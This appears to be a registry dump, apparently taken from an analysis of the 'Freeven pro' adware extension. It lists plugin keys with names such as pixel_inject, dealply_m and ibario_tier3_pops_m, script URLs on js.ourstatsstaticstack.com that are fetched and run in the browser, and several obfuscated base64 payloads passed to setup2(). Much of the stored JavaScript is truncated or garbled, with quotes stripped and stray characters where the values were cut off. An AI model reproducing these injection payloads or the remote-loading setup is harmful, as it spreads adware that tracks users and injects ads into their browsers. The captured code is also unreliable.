"JavaScript" = "if(typeof(appAPI)===undefined){appAPI={};}var CR__bIsIEWindow=false;if(typeof window!==undefined&&typeof window.navigator!==undefined&&typeof window.navigator.userAgent!==undefined){CR__bIsIEWindow=/MSIE (\d \.\d );/.test(window.navigator.userAgent);}CR__bIsIEWindow=(CR__bIsIEWindow||(typeof appAPIinternal!==undefined));appAPI.JSON={};if(typeof JSON!==undefined&&!CR__bIsIEWindow){appAPI.JSON=JSON;}else{(function(){function f(n){return n<10?0 n:n;}if(typeof Date.prototype.to_CR_JSON!==function){Date.prototype.to_CR_JSON=function(key){return isFinite(this.valueOf())?this.getUTCFullYear() - f(this.getUTCMonth() 1) - f(this.getUTCDate()) T f(this.getUTCHours()) : f(this.getUTCMinutes()) : f(this.getUTCSeconds()) Z:null;};String.prototype.to_CR_JSON=Number.prototype.to_CR_JSON=Boolean.prototype.to_CR_JSON=function(key){return this.valueOf();};}var cx=/[\u0000\u00ad\u0600-\u0604\u070f\u17b4\u17b5\u200c-\u200f\u2028-\u202f\u2060-\u206f\ufeff\ufff0-\uffff]/g,escapable=/[\\\\x00-\x1f\x7f-6"

[HKCU\Software\Freeven pro\Plugins\375]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MDE3MDc4NDMwMzFlMDUxMzJmMWMxNjU4NGI0MTQ5MDIwNTE3MGE1NDU1NTUxODRmMDgxODE0MDExMDFkNTQxMzFmMDcwNDQ1MTIxMTFmMGM1NTEwMTAxNzBhMTkxMjExMTMxZTBlNTQxYjEyNTQwOTE5MDIxNDAwMWYxNjRjMDIxOTBlMDMzYzI1MzEzOTI4M2UzMjM4MzgzODI3M2YzYzI1M2YyOTM1MmUyNDM1MjYzZTMxMjkyZjMzM2UyMjJlMmUzYzU4NDI3MDczNTMwOTFmMWUwMTEwMmYxYzE2NTg0YjQxNDkwMjA1MTcwYTFkNDA1NTVlMDgzNDA5MDMwNjE4MDQwOTI1MTgwZjBkMDU1ZjE3MTYxZDE5MWUxZjRmMDgwNTFjNGMxOTFjMWYxODVlMGIwYTFjMTAxMDE5MWMxMzBhMDU0ZjAxMTk0ZTAwMTIwZjE0MTQxNDBkNTYwOTAzMDcwODMxMjUyNTMyMzMyNDM5MjIzMTMzMmEzZjI4MmUyNDMzM2UzNDJkM2UyYjNlMjUyMjM0MjkzNTM4MjcyNTMxNTg1NjdiNjg0OTFhMWQxNjFkMDcxNDMzMTU0MzUxNGE0MjU0NGY2NDA3', 'zzqakjqczn'); }"

[HKCU\Software\Freeven pro\Plugins\7]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/7.js"

[HKCU\Software\Freeven pro\Plugins\44]
"Name" = "IEMisc"

[HKCU\Software\Freeven pro\Plugins\233]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/233.js"

[HKCU\Software\Freeven pro\Plugins\380]
"Version" = "1"

[HKCU\Software\Freeven pro\Plugins\375]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/375.js"

[HKCU\Software\Freeven pro\Manifest]
"ModeType" = "production"

[HKCU\Software\Freeven pro\Plugins\35]
"Version" = "4"

[HKCU\Software\Freeven pro\Plugins\14]
"Name" = "CrossriderUtils"

[HKCU\Software\Freeven pro\Plugins\102]
"Name" = "dealply_m"

[HKCU\Software\Freeven pro\Manifest]
"UninstallerOfferUrl" = "NA"

[HKCU\Software\Freeven pro\Plugins\246]
"Version" = "17"

[HKCU\Software\Freeven pro\Plugins\38]
"Version" = "4"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Freeven pro\Plugins\64]
"JavaScript" = "(function(){var j=__CR_EMPTY_CHANNEL__;var d=function(e){return(typeof e===object&&e!==null);};var b=function(e){return(!!e&&typeof e===string);};var f=function(l){var e;if(typeof l===function){e=j;}else{if(d(l)&&b(l.channel)){e=l.channel;}else{e=j;}}return e;};var k=function(m,e){var l={wrapperMessage:{message:m,channel:f(e)},toIframes:d(e)?e.toIframes:e};return l;};var i=function(m,e){var l={message:m,channel:f(e)};return l;};var h=function(){var e={};e.addListener=appAPI.message.addListener;e.removeListener=appAPI.message.removeListener;e.toActiveTab=appAPI.message.toActiveTab;e.toAllOtherTabs=appAPI.message.toAllOtherTabs;e.toAllTabs=appAPI.message.toAllTabs;e.toBackground=appAPI.message.toBackground;e.toCurrentTabIframes=appAPI.message.toCurrentTabIframes;e.toCurrentTabWindow=appAPI.message.toCurrentTabWindow;e.toPopup=appAPI.message.toPopup;return e;};var a=function(e){appAPI.message.addListener=function(l,o){var n=null;var m;var p=f(l);if(typeof l===function){n=function(q){if(p===q.channel){6"

[HKCU\Software\Freeven pro\Plugins\230]
"Name" = "revizer_ws_dynamic_b2b_2_m"

[HKCU\Software\Freeven pro\Plugins\233]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MDE2NzdiNGMxZDEwMTIxZTM2MDcxNjRmNDg0ZTU3MGMxMjFhMTM0ZjU1NDIxMzFkMDcxMjRiMGY0ZDE0MTEwYzFmMGYxYzBjMDI0MDBkMTAwZTQyMDEwYTVhNTU1MTVlNTM1YTRiNWQ0NzVlNWIwZTE1NGM0ZjdmNzM0ZjFhMWEwMTE0MTUzYjExMTk1ODU3NTI0YzFkMTAxMjFlMTA0ZjU1NDIxMzFkMDcxMjRiMGY0ZDE0MTEwYzFmMGYxYzBjMDI0MDBkMTAwZTQyMDEwYTVhNTU1MTVlNTM1YTRiNWQ0NzVlNWIwZTE1NGM0ZjdmNzM0ZjAyMDIwMDAzMGYwMDJhMTE1ODU3NTI1YzQ2NTc0YTY0NDM1NTVhNGQ1MDE4MTAxNjEyMDcwMDE0MTY0ZjQ4NGUyZTQ2MDcwYTEwNTcyNzQxNzg0ZTU1NDQ0NjRjMGExYjE2MDQxYzBiM2YzNzQ0NTQ0MzU3MGQwNDFjMGExYTEzNDgzMTExMDMwMDVjNDU1ZTQ1MWM1NzVlNTY0NTVhNTA1MjE1NTU0MzE2MWIwMTE5MTMxZTFhMGIwNzNiMTUxYjAxMWMxZTRhNDg0ZTUyM2IzOTJkMzEzYTI5M2UyMDI3MzEyMTM0MzEyNjJkMmUyODNjMmEzMDIwMzkzZDM2MzcyNTI0MzYzMTJhNDM0YTRlNDQxNDFlMDkxZDAwMWIwNTBiMGI0NDRmNWE0YTJkMzEzNjM2MjkzZDMwMjczMzI5MzczYzJhMjUzNjNlM2MzYjNiMjAzNzMxMmE0MzFiNTU0MTdmMDc=', 'zmrnudfncu'); }"

[HKCU\Software\Freeven pro\Plugins\46]
"Version" = "5"

[HKCU\Software\Freeven pro\Plugins\91]
"JavaScript" = "(function(M){window.__loaderIsRunning__=false;var A=[].slice;var z={};var a=function(at){if(typeof at==string&&typeof at.trim==function){return at.trim();}return at==null?:at.toString().replace(/^\s /,).replace(/\s $/,);};function f(at){var au=z[at]={},av,aw;at=at.split(/\s /);for(av=0,aw=at.length;av
[HKCU\Software\Freeven pro\Plugins\4]
"JavaScript" = "var jQuery = $jquery_171 = $jquery = null;if (document && typeof document.getElementById !== undefined) {/*! jQuery v1.7.1 jquery.com | jquery.org/license */(function(a,b){function cy(a){return f.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function cv(a){if(!ck[a]){var b=c.body,d=f(< a >).appendTo(b),e=d.css(display);d.remove();if(e===none||e===){cl||(cl=c.createElement(iframe),cl.frameBorder=cl.width=cl.height=0),b.appendChild(cl);if(!cm||!cl.createElement)cm=(cl.contentWindow||cl.contentDocument).document,cm.write((c.compatMode===CSS1Compat?:) ),cm.close();d=cm.createElement(a),cm.body.appendChild(d),e=f.css(d,display),b.removeChild(cl)}ck[a]=e}return ck[a]}function cu(a,b){var c={};f.each(cq.concat.apply([],cq.slice(0,b)),function(){c[this]=a});return c}function ct(){cr=b}function cs(){setTimeout(ct,0);return cr=f.now()}function cj(){try{return new a.ActiveXObject(Microsoft.XMLHTTP)}catch(b){}}function ci(){try{return new a.XMLHttp-6"

[HKCU\Software\Freeven pro\Plugins\380]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MWE3Mzc4NDcwMTE3MWUxNjJkMGEwZDViNGI0NTRiMGIxZTEyMDg0MjRlNTYxMjAxMDc0ZDBkMDkwYjExMDYxNzAyMDAxYjE1NDQwNTE3MTU0ZTFhMTI0YTA4NGQwMDE1NDcyNzNlMGEwMzA2MzYwZjA1MDUxOTBjMGUwYjJlM2E1NDAwMDk0NDU0NzI2ODViMTkxMTFkMTMxOTMzMGExNDQzNDM1MTQ3MDExNzFlMTYwYjQyNGU1NjE1NTcwODViMGI1MjA5NDE0ZjBhMDIwOTQ3MGIxZDA1MWMxNjRmMTcxNDExNDYwMDA5NDkxOTU2MGIwYTRlM2EzNjEwMTgwNTI3MTQwZTFhMTAxMTA2MTEzNTM5NDUxYjAyNWI1ZDZmNjA0MTFhMGEwZDFmMDgxNzM4MDE0YjU5NGE1NTQwNDg0ZDczNTE0NTQ5NDM0ODBmMTYxNDA4MTcxNDJmM2E0MTUwNDY1YTBmMDgxNzE1MGExZTRkMzUzOTE2MGMwNzI2MTgwNzAwMDAzNTM5NDU1ZjNlMjYzMjM3MjYzMDM5MzQzMTNjMjQyYjJlMmMyNzMwM2UyNzM0MzQyNDJiMmUzMDNhMjYzODM5MzEzYzNlMjY1NjVlMWUwYTA0MDIxNzBmNGYyNjJlMGIxZDA1MzUxMDFkMGEwODI2MmU1ODRlM2MzNTI1MmEzNzMyMmEyMzJjMmQyNjM4MzkyZTNkMzMzMDM3MmMyYzMxMzUzOTVmNDMxNjEwMWYwMTA2MTQ0NDM5MjcxNjE1MWYyZTA3MWIzYzM1NWI1ZjI3M2UzYTIzMmEzYTMwMzgyZjNjM2QzMzI2MzMzNzI2MzQzOTIzMmEyNzNlNWU0YTEyMDAwZDBlMDkwZjU2M2UyNjFmMTEwZjNjMDkwYjA4MjczZTQ0NTYzYTM2MjAzODI5MmIyYjMzMzAzNTIwM2IzYzI5MjczNTI4M2UzMDM1M2EzNjQ0NTExF6"

[HKCU\Software\Freeven pro\Manifest]
"PluginsManifestVersion" = "103"

[HKCU\Software\Freeven pro\Plugins\37]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/37.js"

[HKCU\Software\Freeven pro\Plugins\226]
"Version" = "5"

[HKCU\Software\Freeven pro\Plugins\380]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/380.js"

[HKCU\Software\Freeven pro\Plugins\375]
"Name" = "Dealply_tourist_widget_m"

[HKCU\Software\Freeven pro\Plugins\221]
"Version" = "4"

[HKCU\Software\Freeven pro\Plugins\14]
"Version" = "11"

[HKCU\Software\Freeven pro\Plugins\42]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/42.js"

[HKCU\Software\Freeven pro\Plugins\38]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/38.js"

[HKCU\Software\Freeven pro\Plugins\334]
"Version" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Freeven pro\Plugins\354]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/354.js"

[HKCU\Software\Freeven pro\Plugins\37]
"Name" = "IEBrowserEvents"

[HKCU\Software\Freeven pro\Plugins\35]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/35.js"

[HKCU\Software\Freeven pro\Manifest]
"SetNewTab" = "false"
"Name" = "Freeven pro"

[HKCU\Software\Freeven pro\Plugins\253]
"Version" = "2"

[HKCU\Software\Freeven pro\Plugins\281]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MGE2YjdhNWIwMDE3MTAxMTJkMTExZDQzNDk1OTRhMGIxMDE1MDg1OTVlNGUxMDE1MDMwNzAxMDAxNDEwNWYwMjFjMTQ0NzAyMDAzMjFkMTEwNzA0NWMxZTBkMTczMDAwMWY1YzAxMDgxNzQ0NTk1MjU0NTM0OTQ1MTIwODE3NDQzNzNjMjczMzM3MzAyMjMzM2EzZDJkMzEzYjI0MjAzNzM0MmYzNzNjMmMzYzM3MzQzYTNjMzgyNTJjMjY0ZTAyMTQxMTM2MDIxYzA0NGUyNjM3MjAzNjJlMmIzMDIzMjgzNzNjM2EzYzI1MzEyODNjM2YyMDNlM2MzNzNjNDY0ZDcyNmE1MzExMWYwYzBmMGEwYTI4MWM0MTRiNDE0MTQxNTk2OTE5', 'qasyhcdaxc'); }"

[HKCU\Software\Freeven pro\Plugins\94]
"Version" = "2"

[HKCU\Software\Freeven pro\Plugins]
"BrowserEventPluginList" = "14,42,41,44,39,38,43,37,64"

[HKCU\Software\Freeven pro\Plugins\221]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/221.js"

[HKCU\Software\Freeven pro\Plugins\3]
"Version" = "2"
"Name" = "ie8_fix_2"

[HKCU\Software\Freeven pro\Plugins\184]
"Name" = "noproblemppc_m"

[HKCU\Software\Freeven pro\Plugins\13]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/13.js"

[HKCU\Software\Freeven pro\Plugins\41]
"JavaScript" = "if(typeof appAPI===""undefined""){appAPI={};}(function(a){appAPI.isBackground=false;appAPI.tabId=a.getBhoInstanceId();appAPI.getTabId=function(){return appAPI.tabId;};appAPI.isActiveTab=function(){return appAPIinternal.isActiveTab();};appAPI.platform=""IE"";if(typeof appAPI.appInfo===""undefined""){appAPI.appInfo={};}var c=appAPI.internal.prefs.getChar(""fullVersionForUrl""

[HKCU\Software\Freeven pro\Plugins\220]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/220.js"

[HKCU\Software\Freeven pro\Plugins\184]
"Version" = "11"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Freeven pro\Plugins\91]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/91.js"

[HKCU\Software\Freeven pro\Plugins\44]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/44.js"

[HKCU\Software\Freeven pro\Code]
"NewTabJavaScript" = ""

[HKCU\Software\Freeven pro\Plugins\230]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MDM3YzY3NDMwMDFlMWUwODNkMWYxNDU0NTQ0MTRhMDIxZTBjMTg1NzU3NTkwZjEyMWExYzQ3MTk0NjBjMTMxNzAzMDAwMTAyMGU1NjA2MDgwYzU5MWQwNTQ3NWI1ZDQ4NTg0MjQ5NDY1YTU3NDYwMDE5NWE0NDY3NzE1NDA2MTUxYzFhMTkyZDFhMDE1YTRjNGU0MzAwMWUxZTA4MWI1NzU3NTkwZjEyMWExYzQ3MTk0NjBjMTMxNzAzMDAwMTAyMGU1NjA2MDgwYzU5MWQwNTQ3NWI1ZDQ4NTg0MjQ5NDY1YTU3NDYwMDE5NWE0NDY3NzE1NDFlMGQxZDBkMDMxNjIxMDk1YTRjNGU1MzViNWE0NjcyNDg0ZDU4NTY0YzE3MGQxODFlMTEwYjBjMTQ1NDU0NDEzMzQ4MGIxYzFiNGYyNTVhNjQ0MTQ4NGE0YTVhMDEwMzE0MWYwMDA0MjIzOTQ4NDI0ODRmMGYxZjAwMDUwNzFkNDQyNzFhMWIwMjQ3NTk1MTU4MTI1YjQ4NWM1YjU4NGI0ZTFhNDg0ZDFhMGQwYTAxMTEwNTA2MDQxYTM1MTkwZDBhMDQxYzUxNTQ0MTRmMzUzNTNiM2EyMjJiMjUzYzI4MmMyZjM4MjcyZDM1MmMzMzIwMjUyZDJlMzUyYjNkMmYyNzNmMmEzZTM3NGQ0NjU4NGYwYzFjMTIwMTBmMDYwYjA3MWQ0ZjU3NTg1MTMxM2UyYjM4MjUyYjNiM2YzMTMyMmIzMzM3MmIzYTI4MzcyMzM5M2IyYjNlMzc0ZDE3NDM0YTY3MDU=', 'xvnahjjxhm'); }"

[HKCU\Software\Freeven pro\Plugins\200]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/200.js"

[HKCU\Software\Freeven pro\Plugins\253]
"Name" = "pixel_inject"

[HKCU\Software\Freeven pro\Plugins\47]
"JavaScript" = "(function(){appAPI.ready=function(a){appAPI.resources.isReady(a);};}());var CrossRiderResourcesManager=(function(){var C={appId:(function(){var D=appAPI.appInfo;if(D){return appAPI.appInfo.id;}else{return appAPI.appID;}})(),url:{base:{production:http://resources.crossrider.com,staging:http://staging-app.crossrider.com},update:/apps/{appId}/resources/meta/{lastVersion}},env:appAPI.appInfo.environment===staging?staging:production,saveResource:appAPI.time.daysFromNow(90),nextCheck:360,DBNamespace:Resources_,isDebug:(appAPI.internal.debug.isDebugMode()&&appAPI.internal.db.get(debug_resources_path))},w=o(meta)||{},g=o(remote_resources)||{remoteId:0},t=o(queue)||{},B=o(lastVersion)||0,A,s;appAPI.resources={init:function(){if(C.isDebug){h();}else{l(function(D){if(D){k();}else{h();}});}},isReady:function(D){s=D;if(A){h();}},get:function(D){if(typeof jQuery!==undefined){D=jQuery.trim(D);}return b(D,string);},includeCSS:function(G,F){if(typeof jQuery!==undefined){G=jQuery.trim(G);}var E=b6"

[HKCU\Software\Freeven pro\Plugins\226]
"Name" = "set_campaign_id_m"

[HKCU\Software\Freeven pro\Plugins\45]
"Name" = "IEOnRequest"

[HKCU\Software\Freeven pro\Plugins\223]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MDI3ZDc5NTUxMjA1MGQxYzI0MDgxNTU1NGE1NzU4MTkwZDE4MDE0MDU2NTgxMzEzMTQ1ZjBmMDUwMjFiMWQxMzVlMTQxNTFjNTYxZjEyMDgxMDA3MDQ1ODRiNDU0YzVhNDY0ZDRiNDI0NzQxNGY1ZTA5MWUxNDE2MTYxNjE0NTkxMDAyNDYxZjA0MTgxMDEzNGQyODI1MzIyYjIzMjIyOTJiM2UzNDMyMjgyZTNjMzQyNTNmMzczMzM1MzMyNTIyMmMyZTJlMzMzZDI4MmY1MTBmMWM0NDMzMmUzOTJiMzgyMzI0MjgzODNkMjkyMzI1MzgyNzIwMjgzNDMwMzQyOTJlMjU1YjViN2E3ZTU4MTkwZDE4MDEwOTJjMDUxYzU1NDA1MTViMDQwNTBlMDkwNDRhNTg1NTEyMWQwMjVmMGMxMDA0MTExMzFlNWYxYTAzMWM1NTBhMTQwMjFlMGEwNTU2NWQ0NTRmNGY0MDQ3NDU0ZjQ2NGY1OTVlMGEwYjEyMWMxODFiMTU1NzA2MDI0NTBhMDIxMjFlMWU0YzI2MzMzMjI4MzYyNDIzMjUzMzM1M2MzZTJlM2YyMTIzMzUzOTNlMzQzZDMzMjIyZjNiMjgzOTMzMjUyZTVmMTkxYzQ3MjYyODMzMjUzNTIyMmEzZTM4M2UzYzI1MmYzNjJhMjEyNjIyMzAzNzNjMjgyZjU1NTY3YjcwNGUwMTE2MGMxMDE5MTkzMzE1NWI1NjUxNDg0YjQ0N2EwYQ==', 'ywpwzqylqz'); }"

[HKCU\Software\Freeven pro\Plugins\40]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/40.js"

[HKCU\Software\Freeven pro\Code]
"AppJavaScript" = ""

[HKCU\Software\Freeven pro\Plugins\46]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};appAPI.internal={};appAPI.internal.callbacks={};}else{if(typeof appAPI.internal===undefined){appAPI.internal={};appAPI.internal.callbacks={};}else{if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}}}appAPI.internal.callbacks.timersListeners={};appAPI.internal.callbacks.timersIsInterval={};appAPI.internal.callbacks.timer=function(b){var a=b.timerId;if(typeof a!==number){return;}if(typeof appAPI.internal.callbacks.timersListeners[a]===undefined){return;}var d=appAPI.internal.callbacks.timersListeners[a];if(!appAPI.internal.callbacks.timersIsInterval[a]){clearInterval(a);delete appAPI.internal.callbacks.timersListeners[a];delete appAPI.internal.callbacks.timersIsInterval[a];}try{d();}catch(c){console.error(setInterval/setTimeout - Caught an exception from user callback: (typeof c.message===string?c.message:???));}};(function(a){appAPI.setInterval=function(d,c,e){if((typeof d!==undefined)&&(typeof c===number)){var b=a.setIn6"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Freeven pro\Plugins\233]
"Version" = "7"
"Name" = "revizer_p_dynamic_b2b_2_m"

[HKCU\Software\Freeven pro\Plugins\226]
"URL" = "http://js.ourstatsstaticstack.com/plugins/javascripts/monetization/geo/set_campaign_id_m.js"

[HKCU\Software\Freeven pro\Plugins\43]
"Version" = "5"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Freeven pro\Manifest]
"UpdateInterval" = "360"

[HKCU\Software\Freeven pro\Plugins\64]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/64.js"

[HKCU\Software\Freeven pro\Plugins\281]
"Name" = "ibario_tier3_pops_m"

[HKCU\Software\Freeven pro\Plugins\102]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MDM3YTU0NTU1NTU1NDYxODFmMWEwODI1MDYxOTU3NGY0NDUyMDMxYTBjMDA0ZTVhNWExYzRhMTMxOTBjMGIxYTA3NWIxYzFiMDIxZjQ0MGQwYTEyMTI1YTFmMTQxMjExMTgwZDBhMTkwNDAxNWIxZjE3NGYwODA2MTkxZTFhMTAxOTQ4MDcwMjBmMWMyNzJmMmIzNjI3M2EzNzIzMzkyNzNjMzUyNjJhMzAyZDMwMzUyNTJhM2QzNDJiMjYyMDM3M2IzOTJmMzEyNzU2MTUwNTA1MjEwZDA0MDcwYjQ1MmYyYjM2MjczYTM3MjMzOTI3M2MzNTI2MmEzNDI1MzQyZjI1MmYzNTM1MmIyYTUzMWQwZDE0NTYzMTI3MzMyNjNhMjYyNjM2MzkyZjJiMmEyZjIxMjYzMDI3M2IzOTJmMzEyNzUyNTg3ZjU1NTU0NDUwNDkwNjBjMDQwNDA2MjAwNzA4NTI1MTRlNWExODAwMDEwNTA2NWU1ZjQ0MDcyNzEzMDYxNzA2MWYxNzJmMDIwMDFlMWY1YTAxMTkwNjA3MTQwNTQwMWIxZjE5NWExNjA3MDYxNjQ0MDQxOTA2MTUwNjE2MDcwZDAwMWY0MDEyMDM0YjE2MWQxNDBhMWUwZTAyNDUxMzA2MTEwNzJhM2IyZjI4M2MzNzIzMjcyNzNjMzEyMTIyMzQyYjIwMjQzMTNiMzEzMDIwMmYzODNiM2EyZjNkMzEyYTJhNDIxMTFiMWUyYzE5MDAxOTEwNDgzYjJmMjgzYzM3MjMyNzI3M2MzMTIxMjIzNDJmMjgyMDJiM2IzNDM4MjEyZjM0NDgxMDE5MTA0ODJhMmEyNzIyMjQzZDJiMjIzZDMxMzAyNzNiMjUzODJiMmEyZjNkMzEyYTJhNDY1YzYxNGU1ODUwNTQ1NzA1MTkxMTE3MDIwMDMxMTQ1NjRmNTU0NDU0NDI2MTEz', 'xptuuudpkn'); }"

[HKCU\Software\Freeven pro\Plugins\273]
"Version" = "6"

[HKCU\Software\Freeven pro\Plugins\223]
"Name" = "imonomy_m"

[HKCU\Software\Freeven pro\Plugins\39]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/39.js"

[HKCU\Software\Freeven pro\Plugins\44]
"Version" = "6"

[HKCU\Software\Freeven pro\Plugins\223]
"Version" = "9"
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/223.js"

[HKCU\Software\Freeven pro\Plugins\78]
"Name" = "CrossriderInfo"

[HKCU\Software\Freeven pro\Plugins\354]
"Name" = "categories"

[HKCU\Software\Freeven pro\Plugins]
"OnRequestPluginList" = "14,42,41,39,38,43,45,64"

[HKCU\Software\Freeven pro\Plugins\40]
"Name" = "IEExtension"

[HKCU\Software\Freeven pro\Plugins\38]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.internal.callbacks.genericEvent=function(e){var d=e.eventContent;if(typeof d===undefined){return;}var a=e.eventName;if(typeof a===undefined){return;}if(typeof appAPI.internal.callbacks[a]===undefined){return;}if(typeof appAPI.internal.callbacks[a].handler!==undefined){var b=appAPI.internal.callbacks[a].handler(d);if(b){return;}}if(typeof appAPI.internal.callbacks[a].listeners===undefined){return;}for(var c in appAPI.internal.callbacks[a].listeners){appAPI.internal.callbacks[a].listeners[c](d,c);}};appAPI.internal.callbacks.addListener=function(b,a,c){if(typeof appAPI.internal.callbacks[b]===undefined){appAPI.internal.callbacks[b]={};appAPI.internal.callbacks[b].listeners={};appAPI.internal.callbacks[b].listenersAdditionalData={};appAPI.internal.callbacks[b].listenersIds=0;appAPI.internal.callbacks[b].numberO6"

[HKCU\Software\Freeven pro\Plugins\17]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/17.js"

[HKCU\Software\Freeven pro\Plugins\3]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/3.js"

[HKCU\Software\Freeven pro\Manifest]
"DisableIe" = "true"

[HKCU\Software\Freeven pro\Plugins\391]
"Name" = "50intext_new_m"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Freeven pro\Plugins\35]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}(function(e){if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}function f(m){if(typeof m===object){return m;}if(typeof m!==string){return null;}m=m.replace(/\r\n/g,\n);if(m.lastIndexOf(\n) 1==m.length){m.replace(/(?:(?:^|\n)\s |\s (?:$|\n))/g,).replace(/\s /g, );}var n=m.split(\n);var l={};for(var k=0;k
[HKCU\Software\Freeven pro\Plugins\7]
"Name" = "hooks"

[HKCU\Software\Freeven pro\Plugins\242]
"Version" = "4"

[HKCU\Software\Freeven pro\Plugins\3]
"JavaScript" = "(function(){var b=dummy so this plugin won't be empty;})();"

[HKCU\Software\Freeven pro\Plugins\390]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MGQ2ZDY4NWEwYzFmMTMxNTNiMDMxYTQ1NWI1ODQ2MDMxMzExMWU0YjU5NDgwMjFjMGEwODA2MDYwNjE0NWIwNjRmMTkwZjBhMGEwNDA3MTkxMjQ5MGYxZDEwNDQxNDEwMGM1ZTFlNTc1ODQwNTYwOTAyNGEzMTJlMzUzNTJlMmIzNzM5MmUyMTJiMjMyOTIyMzkyYzIxMjUyMzIwMmEyZTI1MzIyMzI3MmQyZjM4M2E0MTFkNTgwZDEyNDcxNDAyMDM1ODVjNDM0ZjUyNDcxZDFjMWY1YTNhMzEzMjI0MjgzMjJiMzYyMjIzMjAzYzJlMzczNzMxMjcyYTJhMmEyMDMxMmU1NDRiNmI3MTQ2MDMxMzExMWUwMjIzMTUwZDVhNWU0YjQ1MGQxYTA1MDYxNDViNTc0YjA4MDMwYjBkMTAxNTBmMDQ1NTA1NDUwNjBlMGYxYzE3MGUwOTFjNGEwNTAyMTE0MTAyMDMwNTRlMTA1NDUyNWY1NzBjMTQ1OTM4M2UzYjM2MjQzNDM2M2MzODMyMjIzMzI3MjEzMzMzMjAyMDM1MzMyMzNlMmIzMTI5MzgyYzJhMmUyOTQ4MGQ1NjBlMTg1ODE1MDcxNTRiNTU1MzQxNTE0ZDAyMWQxYTRjMjkzODIyMmEyYjM4MzQzNzI3MzUzMzM1M2UzOTM0M2IzODJiMmYzYzMzMzgzZTVhNDg2MTZlNDcxZTFkMDMwMDA4MTYyZDBmNDU1ZjRlNDI0ZjU3NmIwNQ==', 'vgaxdkgenq'); }"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKCU\Software\Freeven pro\Plugins\41]
"Name" = "IEInfo"

[HKCU\Software\Freeven pro\Plugins\9]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/9.js"

[HKCU\Software\Freeven pro\Plugins\193]
